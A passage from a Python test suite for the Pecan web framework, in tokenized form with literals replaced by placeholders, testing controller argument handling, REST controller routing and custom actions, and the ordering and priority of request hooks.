get ( <EOL> '<STR_LIT>' <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:4>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_encoded_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' <EOL> } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_last_kwarg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_last_encoded_kwarg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_middle_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_encoded_variable_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . 
status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_args_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_args_with_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_multiple_variable_kwargs_with_explicit_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs_with_explicit_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( <EOL> '<STR_LIT>' <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs_with_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_kwargs_with_encoded_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> result = '<STR_LIT>' <EOL> assert r . body == b_ ( result ) <EOL> def test_variable_all ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . 
body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_all_with_one_extra ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_all_with_two_extras ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_mixed ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_mixed_explicit ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_post_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_post_mixed ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_no_remainder ( self ) : <EOL> try : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int != <NUM_LIT:200> <EOL> except Exception as ex : <EOL> assert type ( ex ) == TypeError <EOL> assert ex . args [ <NUM_LIT:0> ] in ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_one_remainder ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . 
body == b_ ( '<STR_LIT>' ) <EOL> def test_two_remainders ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_many_remainders ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_remainder_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_remainder_with_many_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_remainder ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_three_remainders ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_many_remainders ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_remainder_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_post_many_remainders_with_many_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . 
body == b_ ( '<STR_LIT>' ) <EOL> class TestRestController ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class OthersController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def echo ( self , req , resp , value ) : <EOL> return str ( value ) <EOL> class ThingsController ( RestController ) : <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _custom_actions = { '<STR_LIT:count>' : [ '<STR_LIT:GET>' ] , '<STR_LIT>' : [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] } <EOL> others = OthersController ( ) <EOL> @ expose ( ) <EOL> def get_one ( self , req , resp , id ) : <EOL> return self . data [ int ( id ) ] <EOL> @ expose ( '<STR_LIT>' ) <EOL> def get_all ( self , req , resp ) : <EOL> return dict ( items = self . data ) <EOL> @ expose ( ) <EOL> def length ( self , req , resp , id , value = None ) : <EOL> length = len ( self . data [ int ( id ) ] ) <EOL> if value : <EOL> length += len ( value ) <EOL> return str ( length ) <EOL> @ expose ( ) <EOL> def post ( self , req , resp , value ) : <EOL> self . data . append ( value ) <EOL> resp . status = <NUM_LIT> <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def edit ( self , req , resp , id ) : <EOL> return '<STR_LIT>' % self . data [ int ( id ) ] <EOL> @ expose ( ) <EOL> def put ( self , req , resp , id , value ) : <EOL> self . data [ int ( id ) ] = value <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def get_delete ( self , req , resp , id ) : <EOL> return '<STR_LIT>' % self . data [ int ( id ) ] <EOL> @ expose ( ) <EOL> def delete ( self , req , resp , id ) : <EOL> del self . 
data [ int ( id ) ] <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def reset ( self , req , resp ) : <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def post_options ( self , req , resp ) : <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def options ( self , req , resp ) : <EOL> abort ( <NUM_LIT> ) <EOL> @ expose ( ) <EOL> def other ( self , req , resp ) : <EOL> abort ( <NUM_LIT> ) <EOL> class RootController ( object ) : <EOL> things = ThingsController ( ) <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_get_all ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( dumps ( dict ( items = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) ) <EOL> def test_get_one ( self ) : <EOL> for i , value in enumerate ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> r = self . app_ . get ( '<STR_LIT>' % i ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( value ) <EOL> def test_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_custom_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_put ( self ) : <EOL> r = self . app_ . put ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_put_with_method_parameter_and_get ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT:X>' } , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_put_with_method_parameter_and_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT>' } ) <EOL> assert r . 
status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_get_delete ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_delete_method ( self ) : <EOL> r = self . app_ . delete ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_delete_with_method_parameter ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_delete_with_method_parameter_and_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_custom_method_type ( self ) : <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_custom_method_type_with_method_parameter ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_options ( self ) : <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_options_with_method_parameter ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_other_custom_action ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_other_custom_action_with_method_parameter ( self ) : <EOL> r = self . app_ . 
post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_nested_controller_with_trailing_slash ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_nested_controller_without_trailing_slash ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> r = self . app_ . request ( '<STR_LIT>' , method = '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_invalid_custom_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_named_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( str ( len ( '<STR_LIT>' ) ) ) <EOL> def test_named_nested_action ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:test>' ) <EOL> def test_nested_post ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:value>' : '<STR_LIT:test>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:test>' ) <EOL> class TestHooks ( PecanTestCase ) : <EOL> def test_basic_single_hook ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SimpleHook ( PecanHook ) : <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def after ( self , state ) : <EOL> run_hook . 
append ( '<STR_LIT>' ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> app = TestApp ( Pecan ( <EOL> RootController ( ) , <EOL> hooks = [ SimpleHook ( ) ] , <EOL> use_context_locals = False <EOL> ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:4> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> def test_basic_multi_hook ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SimpleHook ( PecanHook ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = str ( id ) <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' + self . id ) <EOL> app = TestApp ( Pecan ( RootController ( ) , hooks = [ <EOL> SimpleHook ( <NUM_LIT:1> ) , SimpleHook ( <NUM_LIT:2> ) , SimpleHook ( <NUM_LIT:3> ) <EOL> ] , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . 
body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:10> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:4> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:5> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:6> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:7> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:8> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:9> ] == '<STR_LIT>' <EOL> def test_partial_hooks ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def causeerror ( self , req , resp ) : <EOL> return [ ] [ <NUM_LIT:1> ] <EOL> class ErrorHook ( PecanHook ) : <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> class OnRouteHook ( PecanHook ) : <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> app = TestApp ( Pecan ( RootController ( ) , hooks = [ <EOL> ErrorHook ( ) , OnRouteHook ( ) <EOL> ] , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:2> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> try : <EOL> response = app . 
get ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> assert isinstance ( e , IndexError ) <EOL> assert len ( run_hook ) == <NUM_LIT:2> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT:error>' <EOL> def test_on_error_response_hook ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def causeerror ( self , req , resp ) : <EOL> return [ ] [ <NUM_LIT:1> ] <EOL> class ErrorHook ( PecanHook ) : <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> r = webob . Response ( ) <EOL> r . text = u_ ( '<STR_LIT>' ) <EOL> return r <EOL> app = TestApp ( Pecan ( RootController ( ) , hooks = [ <EOL> ErrorHook ( ) <EOL> ] , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:1> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT:error>' <EOL> assert response . text == '<STR_LIT>' <EOL> def test_prioritized_hooks ( self ) : <EOL> run_hook = [ ] <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SimpleHook ( PecanHook ) : <EOL> def __init__ ( self , id , priority = None ) : <EOL> self . id = str ( id ) <EOL> if priority : <EOL> self . priority = priority <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' + self . 
id ) <EOL> papp = Pecan ( RootController ( ) , hooks = [ <EOL> SimpleHook ( <NUM_LIT:1> , <NUM_LIT:3> ) , SimpleHook ( <NUM_LIT:2> , <NUM_LIT:2> ) , SimpleHook ( <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> ] , use_context_locals = False ) <EOL> app = TestApp ( papp ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:10> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:4> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:5> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:6> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:7> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:8> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:9> ] == '<STR_LIT>' <EOL> def test_basic_isolated_hook ( self ) : <EOL> run_hook = [ ] <EOL> class SimpleHook ( PecanHook ) : <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' ) <EOL> class SubSubController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class SubController ( HookController ) : <EOL> __hooks__ = [ SimpleHook ( ) ] <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> sub = SubSubController ( ) <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . 
append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> sub = SubController ( ) <EOL> app = TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:1> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:3> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:3> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> def test_isolated_hook_with_global_hook ( self ) : <EOL> run_hook = [ ] <EOL> class SimpleHook ( PecanHook ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = str ( id ) <EOL> def on_route ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def before ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def after ( self , state ) : <EOL> run_hook . append ( '<STR_LIT>' + self . id ) <EOL> def on_error ( self , state , e ) : <EOL> run_hook . append ( '<STR_LIT:error>' + self . id ) <EOL> class SubController ( HookController ) : <EOL> __hooks__ = [ SimpleHook ( <NUM_LIT:2> ) ] <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . 
append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> run_hook . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> sub = SubController ( ) <EOL> app = TestApp ( Pecan ( <EOL> RootController ( ) , <EOL> hooks = [ SimpleHook ( <NUM_LIT:1> ) ] , <EOL> use_context_locals = False <EOL> ) ) <EOL> response = app . get ( '<STR_LIT:/>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:4> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> run_hook = [ ] <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert response . body == b_ ( '<STR_LIT>' ) <EOL> assert len ( run_hook ) == <NUM_LIT:6> <EOL> assert run_hook [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:2> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:3> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:4> ] == '<STR_LIT>' <EOL> assert run_hook [ <NUM_LIT:5> ] == '<STR_LIT>' <EOL> class TestGeneric ( PecanTestCase ) : <EOL> @ property <EOL> def root ( self ) : <EOL> class RootController ( object ) : <EOL> def __init__ ( self , unique ) : <EOL> self . unique = unique <EOL> @ expose ( generic = True , template = '<STR_LIT>' ) <EOL> def index ( self , req , resp ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return { '<STR_LIT:hello>' : 